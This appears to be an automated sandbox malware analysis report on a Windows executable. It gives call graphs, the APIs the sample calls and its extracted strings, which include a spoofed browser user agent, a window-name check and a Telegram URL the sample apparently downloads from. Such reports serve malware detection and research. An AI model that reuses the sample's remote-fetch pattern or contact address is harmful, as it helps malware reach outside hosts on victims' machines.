20a7ee 34229->34230 34230->34230 34231 20ad83 std::ios_base::_Init 41 API calls 34230->34231 34232 20a800 34231->34232 34232->34221 34234 20acc5 34233->34234 34235 20acaa 34233->34235 34237 20bc57 41 API calls 2 library calls 34234->34237 34235->34225 34237->34235 34239 205d92 __EH_prolog3 34238->34239 34242 2058bc 34239->34242 34241 205d9f std::ios_base::_Init 34241->34190 34247 22006f 34242->34247 34246 205925 34246->34241 34248 22007c 34247->34248 34254 20590b 34247->34254 34249 225bb8 _Yarn 15 API calls 34248->34249 34248->34254 34250 220099 34249->34250 34251 2200a9 34250->34251 34265 224a96 39 API calls 2 library calls 34250->34265 34262 224f2e 34251->34262 34255 21ca60 34254->34255 34256 21ca69 IsProcessorFeaturePresent 34255->34256 34257 21ca68 34255->34257 34259 21caab 34256->34259 34257->34246 34273 21ca6e SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 34259->34273 34261 21cb8e 34261->34246 34266 2302fe 34262->34266 34265->34251 34267 224f46 34266->34267 34268 230309 RtlFreeHeap 34266->34268 34267->34254 34268->34267 34269 23031e GetLastError 34268->34269 34270 23032b __dosmaperr 34269->34270 34272 224eb3 14 API calls __dosmaperr 34270->34272 34272->34267 34273->34261 34274->34037 34278 20a930 34275->34278 34283 205930 34278->34283 34284 22006f ___std_exception_copy 40 API calls 34283->34284 34285 205972 34284->34285 34286 205dc0 34285->34286 34287 205930 std::bad_exception::bad_exception 40 API calls 34286->34287 34288 205df1 34287->34288 34288->34049 34289->34058 34290 21d012 34291 21d01e __FrameHandler3::FrameUnwindToState 34290->34291 34316 21cd11 34291->34316 34293 21d025 34294 21d17e 34293->34294 34304 21d04f ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 34293->34304 34476 21d3d0 4 API calls 2 library calls 34294->34476 34296 21d185 34477 22c26b 21 API calls __FrameHandler3::FrameUnwindToState 34296->34477 34298 21d18b 34478 22c22f 21 API calls __FrameHandler3::FrameUnwindToState 34298->34478 34300 21d193 34301 21d06e 34302 21d0ef 34324 22ca57 34302->34324 34304->34301 34304->34302 34475 22c245 39 API calls 3 library calls 34304->34475 34306 21d0f5 34328 217be1 34306->34328 34317 21cd1a 34316->34317 34479 21d1df IsProcessorFeaturePresent 34317->34479 34319 21cd26 34480 22011c 10 API calls 2 library calls 34319->34480 34321 21cd2b 34322 21cd2f 34321->34322 34481 22013b 7 API calls 2 library calls 34321->34481 34322->34293 34325 22ca60 34324->34325 34326 22ca65 34324->34326 34482 22c58c 53 API calls 34325->34482 34326->34306 34329 217bf0 __EH_prolog3_GS 34328->34329 34483 217aaa 34329->34483 34333 217c0a 34334 20a85f std::ios_base::_Init 41 API calls 34333->34334 34335 217c26 34334->34335 34495 2061c0 34335->34495 34337 20a85f std::ios_base::_Init 41 API calls 34361 217e86 34337->34361 34338 2173cd 50 API calls 34370 217c47 34338->34370 34339 217f5e 34520 21b11a 34339->34520 34341 217f6e 34527 20a898 34341->34527 34342 20e073 41 API calls 34342->34370 34348 217f9d 34539 20b558 34348->34539 34350 216884 41 API calls 34350->34370 34352 217fcb 34575 21840e 41 API calls 34352->34575 34354 217fda FindWindowA 34576 20b3e8 41 API calls 2 library calls 34354->34576 34356 217ffc 34577 20b3e8 41 API calls 2 library calls 34356->34577 34358 218007 34578 20b3e8 41 API calls 2 library calls 34358->34578 34359 20e073 41 API calls 34359->34361 34361->34339 34361->34359 34363 2186f4 39 API calls 34361->34363 34550 20b4ba 41 API calls 2 library calls 34361->34550 34551 20b614 41 API calls 2 library calls 34361->34551 34552 2173cd 34361->34552 34362 218020 34579 20a568 41 API calls 2 library calls 34362->34579 34363->34361 34365 218028 34580 20b3e8 41 API calls 2 library calls 34365->34580 34366 217e63 34366->34337 34368 20a85f std::ios_base::_Init 41 API calls 34368->34370 34369 218044 34581 20a568 41 API calls 2 library calls 34369->34581 34370->34338 34370->34342 34370->34350 34370->34366 34370->34368 34390 2186f4 39 API calls 34370->34390 34398 217b46 41 API calls 34370->34398 34405 21b11a 44 API calls 34370->34405 34549 2186bf 39 API calls 34370->34549 34372 21804c 34582 215726 41 API calls 2 library calls 34372->34582 34375 21805c 34583 215040 95 API calls 4 library calls 34375->34583 34377 218064 34584 20a568 41 API calls 2 library calls 34377->34584 34379 21808f 34585 21ad7e 41 API calls 2 library calls 34379->34585 34381 2180a3 34382 218269 34381->34382 34586 20b3e8 41 API calls 2 library calls 34381->34586 34610 20a568 41 API calls 2 library calls 34382->34610 34385 21828a 34611 21ad7e 41 API calls 2 library calls 34385->34611 34386 2180cf 34587 20a568 41 API calls 2 library calls 34386->34587 34389 2180d7 34588 21ad7e 41 API calls 2 library calls 34389->34588 34390->34370 34391 21829e 34393 2183a5 34391->34393 34612 20b3e8 41 API calls 2 library calls 34391->34612 34626 20a568 41 API calls 2 library calls 34393->34626 34396 2183c1 34627 21ad7e 41 API calls 2 library calls 34396->34627 34397 2182c5 34613 20a568 41 API calls 2 library calls 34397->34613 34398->34370 34401 2180eb 34401->34382 34589 20b3e8 41 API calls 2 library calls 34401->34589 34402 2183d5 34406 218405 ExitProcess 34402->34406 34628 20b3e8 41 API calls 2 library calls 34402->34628 34403 2182cd 34614 21ad7e 41 API calls 2 library calls 34403->34614 34405->34370 34408 21810b 34590 20b3e8 41 API calls 2 library calls 34408->34590 34411 2183f0 34629 20a568 41 API calls 2 library calls 34411->34629 34412 218116 34591 20b3e8 41 API calls 2 library calls 34412->34591 34415 2183f8 34630 2176ce 57 API calls 3 library calls 34415->34630 34416 2182e1 34416->34393 34615 20b3e8 41 API calls 2 library calls 34416->34615 34418 218126 34592 20b3e8 41 API calls 2 library calls 34418->34592 34420 218301 34616 20b3e8 41 API calls 2 library calls 34420->34616 34423 218135 34593 20b3e8 41 API calls 2 library calls 34423->34593 34424 21830c 34617 20b3e8 41 API calls 2 library calls 34424->34617 34426 218152 34594 20a568 41 API calls 2 library calls 34426->34594 34429 218325 34618 20a568 41 API calls 2 library calls 34429->34618 34430 21815a 34595 20b3e8 41 API calls 2 library calls 34430->34595 34433 21832d 34619 20b3e8 41 API calls 2 library calls 34433->34619 34434 218176 34596 20a568 41 API calls 2 library calls 34434->34596 34437 218348 34620 20a568 41 API calls 2 library calls 34437->34620 34438 21817e 34597 20b3e8 41 API calls 2 library calls 34438->34597 34441 218350 34621 20b3e8 41 API calls 2 library calls 34441->34621 34442 21819d 34598 20a568 41 API calls 2 library calls 34442->34598 34445 21836c 34622 20a568 41 API calls 2 library calls 34445->34622 34446 2181a5 34599 20b3e8 41 API calls 2 library calls 34446->34599 34449 218374 34623 2197dc 48 API calls 2 library calls 34449->34623 34451 2181c4 34600 20a568 41 API calls 2 library calls 34451->34600 34452 218387 34624 21960c 128 API calls __EH_prolog3_GS 34452->34624 34455 2181cc 34601 20b3e8 41 API calls 2 library calls 34455->34601 34456 218396 34625 2185fd 41 API calls 34456->34625 34458 2181e8 34602 20a568 41 API calls 2 library calls 34458->34602 34461 2181f0 34603 20b3e8 41 API calls 2 library calls 34461->34603 34463 21820c 34604 20a568 41 API calls 2 library calls 34463->34604 34465 218214 34605 20b3e8 41 API calls 2 library calls 34465->34605 34467 218230 34606 20a568 41 API calls 2 library calls 34467->34606 34469 218238 34607 209fc4 48 API calls 2 library calls 34469->34607 34471 21824b 34608 209a90 168 API calls 2 library calls 34471->34608 34473 21825a 34609 2184e1 41 API calls 34473->34609 34475->34302 34476->34296 34477->34298 34478->34300 34479->34319 34480->34321 34481->34322 34482->34326 34484 217ab6 __EH_prolog3_GS 34483->34484 34631 21da56 34484->34631 34486 217ac8 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 34487 20e073 41 API calls 34486->34487 34488 217b15 34487->34488 34489 23fc49 5 API calls 34488->34489 34490 217b45 34489->34490 34491 2186f4 34490->34491 34492 218706 34491->34492 34493 2186ff 34491->34493 34492->34333 34494 20ac78 std::ios_base::_Init 39 API calls 34493->34494 34494->34492 34496 2061cc __EH_prolog3_GS 34495->34496 34497 20a898 std::ios_base::_Init 41 API calls 34496->34497 34498 2061d9 34497->34498 34639 21c2b7 34498->34639 34501 20a85f std::ios_base::_Init 41 API calls 34502 2061fc 34501->34502 34651 21c0f0 34502->34651 34505 20a85f std::ios_base::_Init 41 API calls 34506 20622e 34505->34506 34507 21c0f0 44 API calls 34506->34507 34508 20623b 34507->34508 34509 20a85f std::ios_base::_Init 41 API calls 34508->34509 34510 206250 34509->34510 34511 21c0f0 44 API calls 34510->34511 34512 20625d 34511->34512 34513 20a85f std::ios_base::_Init 41 API calls 34512->34513 34514 206272 34513->34514 34515 21c0f0 44 API calls 34514->34515 34516 20627f InternetOpenA 34515->34516 34518 23fc49 5 API calls 34516->34518 34519 2062ad 34518->34519 34519->34370 34521 21b126 __EH_prolog3 34520->34521 34522 21b2a0 std::ios_base::_Init 34521->34522 34524 21b243 34521->34524 34526 20ac9e 41 API calls 34521->34526 34679 22b9f0 42 API calls 3 library calls 34521->34679 34522->34341 34524->34522 34525 20ac9e 41 API calls 34524->34525 34525->34524 34526->34521 34528 20a8bb 34527->34528 34680 20bbf3 34528->34680 34530 20a8c6 34531 21b2ab 34530->34531 34532 21b2b7 __EH_prolog3 34531->34532 34533 20a85f std::ios_base::_Init 41 API calls 34532->34533 34538 21b2e4 34533->34538 34534 21b31f 34536 20ac78 std::ios_base::_Init 39 API calls 34534->34536 34535 20ac9e 41 API calls 34535->34538 34537 21b32b std::ios_base::_Init 34536->34537 34537->34348 34538->34534 34538->34535 34540 20b567 __EH_prolog3 34539->34540 34688 20b07f 34540->34688 34542 20b598 34711 20e0d4 34542->34711 34544 20b5de 34717 20c1b8 34544->34717 34548 20b600 std::ios_base::_Init _Func_class 34548->34352 34549->34370 34550->34361 34551->34361 34553 2173e8 ___scrt_uninitialize_crt 34552->34553 34554 21c2b7 47 API calls 34553->34554 34555 21742e 34554->34555 34556 20a85f std::ios_base::_Init 41 API calls 34555->34556 34557 217445 34556->34557 34558 21c0f0 44 API calls 34557->34558 34559 217456 34558->34559 34560 20a85f std::ios_base::_Init 41 API calls 34559->34560 34561 21747e 34560->34561 34562 21c0f0 44 API calls 34561->34562 34563 21748f 34562->34563 34564 20a85f std::ios_base::_Init 41 API calls 34563->34564 34565 2174a7 34564->34565 34566 21c0f0 44 API calls 34565->34566 34567 2174b8 InternetOpenUrlA 34566->34567 34569 2175d1 34567->34569 34571 217571 34567->34571 34572 21ca60 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34569->34572 34570 217590 InternetReadFile 34570->34569 34570->34571 34571->34569 34571->34570 34899 217870 34571->34899 34573 2175ff 34572->34573 34573->34361 34575->34354 34576->34356 34577->34358 34578->34362 34579->34365 34580->34369 34581->34372 34582->34375 34583->34377 34584->34379 34585->34381 34586->34386 34587->34389 34588->34401 34589->34408 34590->34412 34591->34418 34592->34423 34593->34426 34594->34430 34595->34434 34596->34438 34597->34442 34598->34446 34599->34451 34600->34455 34601->34458 34602->34461 34603->34463 34604->34465 34605->34467 34606->34469 34607->34471 34608->34473 34609->34382 34610->34385 34611->34391 34612->34397 34613->34403 34614->34416 34615->34420 34616->34424 34617->34429 34618->34433 34619->34437 34620->34441 34621->34445 34622->34449 34623->34452 34624->34456 34625->34393 34626->34396 34627->34402 34628->34411 34629->34415 34630->34406 34634 21f815 34631->34634 34635 21f851 GetSystemTimeAsFileTime 34634->34635 34636 21f845 GetSystemTimePreciseAsFileTime 34634->34636 34637 21da64 34635->34637 34636->34637 34637->34486 34670 23fc9a 34639->34670 34641 21c2c6 GetPEB 34646 21c2e5 ctype 34641->34646 34650 21c3c5 34641->34650 34642 23fc49 5 API calls 34643 2061e8 34642->34643 34643->34501 34645 224a96 39 API calls ___std_exception_copy 34645->34646 34646->34645 34647 22bd0a 43 API calls 34646->34647 34648 20a85f 41 API calls std::ios_base::_Init 34646->34648 34649 20ac78 39 API calls std::ios_base::_Init 34646->34649 34646->34650 34671 21c272 WideCharToMultiByte 34646->34671 34647->34646 34648->34646 34649->34646 34650->34642 34652 21c0fc __EH_prolog3_catch_GS 34651->34652 34653 21c107 34652->34653 34668 21c11a 34652->34668 34654 20ac78 std::ios_base::_Init 39 API calls 34653->34654 34655 21c113 34654->34655 34672 23fc58 34655->34672 34656 21c210 34658 20ac78 std::ios_base::_Init 39 API calls 34656->34658 34658->34655 34661 206209 34661->34505 34662 21c25d 34677 21d9ca 41 API calls 2 library calls 34662->34677 34663 21c267 34678 21da0a 41 API calls 2 library calls 34663->34678 34666 20a85f std::ios_base::_Init 41 API calls 34666->34668 34668->34656 34668->34662 34668->34663 34668->34666 34669 20ac78 std::ios_base::_Init 39 API calls 34668->34669 34675 224eb3 14 API calls __dosmaperr 34668->34675 34676 229b67 42 API calls _Fputc 34668->34676 34669->34668 34670->34641 34671->34646 34673 21ca60 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34672->34673 34674 23fc62 34673->34674 34674->34674 34675->34668 34676->34668 34679->34521 34681 20bc51 34680->34681 34685 20bc07 std::ios_base::_Init 34680->34685 34687 205cb5 41 API calls std::ios_base::_Init 34681->34687 34683 20bc0e _Yarn 34683->34530 34685->34683 34686 20fa93 std::ios_base::_Init 41 API calls 34685->34686 34686->34683 34689 20b08b __EH_prolog3_GS 34688->34689 34690 20b18c 34689->34690 34692 20b0a3 34689->34692 34693 20b0e3 34689->34693 34694 20b0b4 34689->34694 34695 20b11e 34689->34695 34708 20b0a8 34689->34708 34691 20b197 34690->34691 34690->34708 34699 20a85f std::ios_base::_Init 41 API calls 34691->34699 34784 20b8d3 41 API calls 2 library calls 34692->34784 34700 21cc6b std::_Facet_Register 41 API calls 34693->34700 34698 21cc6b std::_Facet_Register 41 API calls 34694->34698 34701 21cc6b std::_Facet_Register 41 API calls 34695->34701 34697 23fc49 5 API calls 34702 20b0b1 34697->34702 34698->34708 34703 20b1a4 34699->34703 34704 20b0f2 34700->34704 34701->34708 34702->34542 34785 20bedb 41 API calls 2 library calls 34703->34785 34706 20a85f std::ios_base::_Init 41 API calls 34704->34706 34706->34708 34707 20b1b8 34709 2202fe Concurrency::cancel_current_task KiUserExceptionDispatcher 34707->34709 34708->34697 34710 20b1c8 34709->34710 34712 20e0e0 __EH_prolog3 _Func_class 34711->34712 34786 210264 34712->34786 34716 20e175 std::ios_base::_Init _Func_class 34716->34544 34718 20c1c7 __EH_prolog3_GS 34717->34718 34719 20c367 34718->34719 34722 20c1da ctype 34718->34722 34866 20f10f 34719->34866 34890 20caf1 41 API calls 3 library calls 34722->34890 34723 20ce70 44 API calls 34724 20c3ac 34723->34724 34726 20a85f std::ios_base::_Init 41 API calls 34724->34726 34776 20c469 34724->34776 34729 20c3c8 34726->34729 34727 20c49f 34735 20be69 std::ios_base::_Init 39 API calls 34727->34735 34758 20c362 34727->34758 34728 20c217 34891 20e5d5 46 API calls 2 library calls 34728->34891 34732 20cba6 46 API calls 34729->34732 34730 20b07f 41 API calls 34733 20c490 34730->34733 34737 20c3e3 34732->34737 34897 20a4fa 41 API calls 34733->34897 34734 20c22c 34739 20ce70 44 API calls 34734->34739 34735->34758 34736 23fc49 5 API calls 34740 20b5f1 34736->34740 34741 20efdd 41 API calls 34737->34741 34742 20c23c 34739->34742 34783 20c0c7 39 API calls _Func_class 34740->34783 34743 20c407 34741->34743 34744 20c2f7 34742->34744 34746 20a85f std::ios_base::_Init 41 API calls 34742->34746 34745 20cce6 46 API calls 34743->34745 34747 20c321 34744->34747 34748 20c2fd 34744->34748 34750 20c41e 34745->34750 34751 20c255 34746->34751 34749 20c353 34747->34749 34754 20b07f 41 API calls 34747->34754 34752 20b07f 41 API calls 34748->34752 34895 20c9f1 41 API calls _Func_class 34749->34895 34756 20fa63 41 API calls 34750->34756 34757 20cba6 46 API calls 34751->34757 34753 20c31b 34752->34753 34894 20a4fa 41 API calls 34753->34894 34754->34753 34759 20c42d 34756->34759 34760 20c26d 34757->34760 34758->34736 34763 20ac78 std::ios_base::_Init 39 API calls 34759->34763 34761 20efdd 41 API calls 34760->34761 34764 20c291 34761->34764 34765 20c43c 34763->34765 34766 20cce6 46 API calls 34764->34766 34896 205f62 14 API calls 2 library calls 34765->34896 34768 20c2ac 34766->34768 34892 20f0df 41 API calls Concurrency::cancel_current_task 34768->34892 34769 20c44b 34771 20ac78 std::ios_base::_Init 39 API calls 34769->34771 34773 20c45a 34771->34773 34772 20c2be 34775 20ac78 std::ios_base::_Init 39 API calls 34772->34775 34774 20ac78 std::ios_base::_Init 39 API calls 34773->34774 34774->34776 34777 20c2cd 34775->34777 34776->34727 34776->34730 34893 205f62 14 API calls 2 library calls 34777->34893 34779 20c2dc 34780 20ac78 std::ios_base::_Init 39 API calls 34779->34780 34781 20c2eb 34780->34781 34782 20ac78 std::ios_base::_Init 39 API calls 34781->34782 34782->34744 34783->34548 34784->34708 34785->34707 34812 229bf9 34786->34812 34789 20ce70 34790 20ceaa 34789->34790 34791 20ce89 34789->34791 34806 20ceb1 34790->34806 34808 20cee3 34790->34808 34862 20dc05 41 API calls 34790->34862 34859 20dc05 41 API calls 34791->34859 34794 20ce8e 34794->34790 34860 20dc05 41 API calls 34794->34860 34796 20ce9c 34796->34806 34861 20dc05 41 API calls 34796->34861 34798 20cf4a 34801 20cfea 34798->34801 34804 20cf53 34798->34804 34799 21ca60 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34800 20d08d 34799->34800 34800->34716 34805 20d01e 34801->34805 34810 20cf69 34801->34810 34802 20dc05 41 API calls 34802->34808 34804->34806 34809 20cfc1 34804->34809 34804->34810 34805->34806 34865 20d235 41 API calls 34805->34865 34806->34799 34808->34798 34808->34802 34808->34806 34864 20d5be 41 API calls 34809->34864 34810->34806 34863 20d270 44 API calls 2 library calls 34810->34863 34817 2313a9 GetLastError 34812->34817 34818 2313c5 34817->34818 34819 2313bf 34817->34819 34823 2313c9 34818->34823 34851 232067 6 API calls __Getctype 34818->34851 34850 232028 6 API calls __Getctype 34819->34850 34822 2313e1 34822->34823 34824 2313e9 34822->34824 34825 23144e SetLastError 34823->34825 34852 2302a1 14 API calls 3 library calls 34824->34852 34828 229c04 34825->34828 34829 23145e 34825->34829 34827 2313f6 34830 23140f 34827->34830 34831 2313fe 34827->34831 34846 232316 34828->34846 34857 22fac6 39 API calls __FrameHandler3::FrameUnwindToState 34829->34857 34854 232067 6 API calls __Getctype 34830->34854 34853 232067 6 API calls __Getctype 34831->34853 34836 23140c 34840 2302fe ___free_lconv_mon 14 API calls 34836->34840 34837 23141b 34838 231436 34837->34838 34839 23141f 34837->34839 34856 2311d7 14 API calls __dosmaperr 34838->34856 34855 232067 6 API calls __Getctype 34839->34855 34843 231433 34840->34843 34843->34825 34844 231441 34845 2302fe ___free_lconv_mon 14 API calls 34844->34845 34845->34843 34847 20e160 34846->34847 34848 232329 34846->34848 34847->34789 34848->34847 34858 238421 39 API calls 4 library calls 34848->34858 34850->34818 34851->34822 34852->34827 34853->34836 34854->34837 34855->34836 34856->34844 34858->34847 34859->34794 34860->34796 34861->34790 34862->34790 34863->34806 34864->34806 34865->34806 34867 20f11e __EH_prolog3_GS 34866->34867 34868 20a85f std::ios_base::_Init 41 API calls 34867->34868 34869 20f93d 34868->34869 34870 20cba6 46 API calls 34869->34870 34871 20f955 34870->34871 34872 20efdd 41 API calls 34871->34872 34873 20f973 34872->34873 34874 20cce6 46 API calls 34873->34874 34875 20f988 34874->34875 34876 20fa63 41 API calls 34875->34876 34877 20f996 34876->34877 34878 20ac78 std::ios_base::_Init 39 API calls 34877->34878 34879 20f9a4 34878->34879 34898 205f62 14 API calls 2 library calls 34879->34898 34881 20f9b3 34882 20ac78 std::ios_base::_Init 39 API calls 34881->34882 34883 20f9c2 34882->34883 34884 20ac78 std::ios_base::_Init 39 API calls 34883->34884 34885 20f9ce 34884->34885 34886 20f9e8 34885->34886 34887 20be69 std::ios_base::_Init 39 API calls 34885->34887 34888 23fc49 5 API calls 34886->34888 34887->34886 34889 20c3a2 34888->34889 34889->34723 34890->34728 34891->34734 34892->34772 34893->34779 34894->34749 34895->34758 34896->34769 34897->34727 34898->34881 34900 21787c __EH_prolog3_catch 34899->34900 34901 2178d9 34900->34901 34902 217a6a 34900->34902 34903 217985 _Yarn std::ios_base::_Init 34900->34903 34905 20fa93 std::ios_base::_Init 41 API calls 34901->34905 34914 20b2c0 41 API calls std::ios_base::_Init 34902->34914 34903->34571 34911 217910 _Yarn 34905->34911 34913 2100c0 39 API calls std::ios_base::_Init 34911->34913 34913->34903 34915 20ac27 34916 20ac3c 34915->34916 34917 20ac2f 34915->34917 34918 20be69 std::ios_base::_Init 39 API calls 34917->34918 34918->34916

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 002173CD Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 167networkfileCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0021C2B7: __EH_prolog3_GS.LIBCMT ref: 0021C2C1
                                                                                                                                                                                              • Part of subcall function 0021C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0021C0F7
                                                                                                                                                                                            • InternetOpenUrlA.WININET ref: 0021753F
                                                                                                                                                                                            • InternetReadFile.WININET ref: 00217590
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Internet$FileH_prolog3_H_prolog3_catch_OpenRead
                                                                                                                                                                                            • String ID: 789593363246702628$8045878863314484420$9351356959942806932$Kernel32.dll$Wininet.dll
                                                                                                                                                                                            • API String ID: 3547353422-2454429382
                                                                                                                                                                                            • Opcode ID: 56ab3980a31ed56c4b3b657d58babb0ac0e0830e3759bf065024349e8bfa1da4
                                                                                                                                                                                            • Instruction ID: bdcf2a143dd4d5731bbda098fcc6345f2fcc9e2a985cd139a837c3fb14109fe5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 56ab3980a31ed56c4b3b657d58babb0ac0e0830e3759bf065024349e8bfa1da4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 58516F74A10268EFDB24DF24CD49BDDBBF9FB09310F0040A9E949A7281D7B45E948FA1
                                                                                                                                                                                            Function 00217BE1 Relevance: 30.3, APIs: 3, Strings: 14, Instructions: 563COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 0 217be1-217c55 call 23fc9a call 217aaa call 2186f4 call 20a821 call 20a85f call 209973 call 2061c0 15 217e52-217e5d call 20b3b2 0->15 18 217e63 15->18 19 217c5a-217ca1 call 217603 call 2173cd call 217854 call 2186b1 call 20e073 15->19 21 217e7d-217e8a call 20a85f 18->21 43 217ca6-217d23 call 217b46 call 21b11a call 216884 call 2186f4 call 20a821 * 3 call 20b682 19->43 26 217f4c-217f58 call 20b3b2 21->26 32 217e8f-217f47 call 217603 call 20b4ba call 20b614 call 2173cd call 20a821 * 2 call 217854 call 2186b1 call 20e073 call 2186f4 call 20a821 call 20a678 26->32 33 217f5e-217fc6 call 21b11a call 20a898 call 21b2ab call 20a1f8 call 20b558 26->33 32->26 62 217fcb-2180a8 call 21840e FindWindowA call 20b3e8 * 3 call 20a568 call 20b3e8 call 20a568 call 215726 call 215040 call 20a568 call 21ad7e 33->62 93 217e65-217e78 call 20a821 call 20a678 43->93 94 217d29-217e4d call 20a85f call 2173cd call 2186bf call 20a678 call 20a821 call 217854 call 2186b1 call 20e073 call 2186f4 call 20a821 call 217b46 call 21b11a call 216884 call 2186f4 call 20a821 * 4 call 20a678 43->94 126 21826e-2182a3 call 20a568 call 21ad7e 62->126 127 2180ae-2180f0 call 20b3e8 call 20a568 call 21ad7e 62->127 93->21 94->15 143 2183a5-2183da call 20a568 call 21ad7e 126->143 144 2182a9-2182e6 call 20b3e8 call 20a568 call 21ad7e 126->144 127->126 149 2180f6-218269 call 2185ea call 20b3e8 * 5 call 20a568 call 20b3e8 call 20a568 call 20b3e8 call 20a568 call 20b3e8 call 20a568 call 20b3e8 call 20a568 call 20b3e8 call 20a568 call 20b3e8 call 20a568 call 209fc4 call 209a90 call 2184e1 127->149 163 218405-218407 ExitProcess 143->163 164 2183dc-218400 call 20b3e8 call 20a568 call 2176ce 143->164 144->143 173 2182ec-2183a0 call 2186a1 call 20b3e8 * 3 call 20a568 call 20b3e8 call 20a568 call 20b3e8 call 20a568 call 2197dc call 21960c call 2185fd 144->173 149->126 164->163 173->143
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00217BEB
                                                                                                                                                                                              • Part of subcall function 00217AAA: __EH_prolog3_GS.LIBCMT ref: 00217AB1
                                                                                                                                                                                              • Part of subcall function 00217AAA: __Xtime_get_ticks.LIBCPMT ref: 00217AC3
                                                                                                                                                                                              • Part of subcall function 00217AAA: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00217AD0
                                                                                                                                                                                              • Part of subcall function 002061C0: __EH_prolog3_GS.LIBCMT ref: 002061C7
                                                                                                                                                                                              • Part of subcall function 002061C0: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00000000,2226158375018974002), ref: 0020629D
                                                                                                                                                                                            • FindWindowA.USER32(Hello,World), ref: 00217FE8
                                                                                                                                                                                              • Part of subcall function 0020B3E8: __EH_prolog3.LIBCMT ref: 0020B3EF
                                                                                                                                                                                              • Part of subcall function 0020A568: __EH_prolog3_GS.LIBCMT ref: 0020A56F
                                                                                                                                                                                              • Part of subcall function 00215726: __EH_prolog3.LIBCMT ref: 0021572D
                                                                                                                                                                                              • Part of subcall function 00215040: __EH_prolog3_GS.LIBCMT ref: 0021504A
                                                                                                                                                                                              • Part of subcall function 00215040: GetNativeSystemInfo.KERNEL32(?,x86,00000000), ref: 00215155
                                                                                                                                                                                              • Part of subcall function 0021AD7E: __EH_prolog3.LIBCMT ref: 0021AD85
                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00218407
                                                                                                                                                                                              • Part of subcall function 00209FC4: __EH_prolog3.LIBCMT ref: 00209FCB
                                                                                                                                                                                              • Part of subcall function 00209A90: __EH_prolog3_GS.LIBCMT ref: 00209A9A
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_$H_prolog3$ExitFindInfoInternetNativeOpenProcessSystemUnothrow_t@std@@@WindowXtime_get_ticks__ehfuncinfo$??2@
                                                                                                                                                                                            • String ID: .$/ujs/$1735725670$Hello$Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603$World$brCH$brGk$exG$fnc$https://$https://t.me/asdfghjrrewqqqqtfg$ostr$str
                                                                                                                                                                                            • API String ID: 1170277527-2895834990
                                                                                                                                                                                            • Opcode ID: 70df240588e871c9945fb55ec82d55d1cfb1b5e32ca7a01ce4e4efbda96df53e
                                                                                                                                                                                            • Instruction ID: 4bfb61e71c6cdab5af2725675c3c39da962b49271db7262ea588149b63ef8a36
                                                                                                                                                                                            • Opcode Fuzzy Hash: 70df240588e871c9945fb55ec82d55d1cfb1b5e32ca7a01ce4e4efbda96df53e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 22328E31D21398AADB15EBA8C996BDDBBB86F25300F5440D9E405631C3DB741F68CF62
                                                                                                                                                                                            Function 002061C0 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 75networkCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 002061C7
                                                                                                                                                                                              • Part of subcall function 0021C2B7: __EH_prolog3_GS.LIBCMT ref: 0021C2C1
